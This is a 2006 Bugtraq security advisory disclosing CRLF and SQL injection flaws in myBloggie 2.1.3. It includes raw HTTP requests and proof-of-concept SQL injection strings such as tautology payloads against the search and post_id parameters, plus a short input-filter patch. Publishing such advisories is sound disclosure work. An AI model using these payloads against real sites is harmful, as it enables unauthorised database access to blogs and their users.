HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection
From: h4cky0u.org@xxxxxxxxx
Date: 17 May 2006 12:59:01 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

------------------------------------------------------
      HYSA-2006-008 h4cky0u.org Advisory 017
------------------------------------------------------
Date - Wed May 17 2006


TITLE:
======

myBloggie 2.1.3 CRLF & SQL Injection 


SEVERITY: 
========= 

Medium 


SOFTWARE: 
========= 

myBloggie 2.1.3 

http://mybloggie.mywebland.com/ 


INFO: 
===== 

myBloggie is considered one of the most simple, user-friendliest yet packed 
with features 

Weblog system available to date. 


DESCRIPTION: 
============ 

--==CRLF injection==-- 

GET /mybloggie/ HTTP/1.0 
Accept: */* 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) 
Host: 127.0.0.1:80 
Cookie: PHPSESSID=op0-11{}};q, or something like that 
Connection: Close 

GET /mybloggie/admin.php HTTP/1.0 
Accept: */* 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) 
Host: 127.0.0.1:80 
Cookie: PHPSESSID=op0-11{}};q, or something like that 
Connection: Close 

GET /mybloggie/index.php HTTP/1.0 
Accept: */* 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) 
Host: 127.0.0.1:80 
Cookie: PHPSESSID=op0-11{}};q, or something like that 
Connection: Close 

--==SQL injection==-- 

http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id=' 

Also MurderSkillz discovered a bug in the search function. Here is a 
proof-of-concept: 

1' having '1'='1'-- 

or 

' or 'x'='x-- 

And a little patch from me: 

if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){ 
    echo "Invalid Characters"; 
    exit; 
    } 
    
if (isset($_GET['select'])) $select=$_GET['select']; 
if (isset($_POST['keyword'])) $keyword=$_POST['keyword']; 


$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword); 
//.... 
  

VENDOR STATUS: 
============== 

Vendor was contacted but no response received till date. 


CREDITS: 
======== 

This vulnerability was discovered and researched by 
matrix_killer of  h4cky0u Security Forums. 

mail : matrix_k at abv.bg 

web : http://www.h4cky0u.org 


Search function sql injection was discovered by:  MurderSkillz


Co-Researcher:
 
h4cky0u of h4cky0u Security Forums. 

mail : h4cky0u at gmail.com 

web : http://www.h4cky0u.org 

Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt

Prev by Date: OpenWiki<--v0.78 Cross-Site Scripting
Next by Date: Re: The Weakness of Windows Impersonation Model
Previous by thread: Re: OpenWiki<--v0.78 Cross-Site Scripting
Next by thread: Re: HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection
Index(es):
- Date
- Thread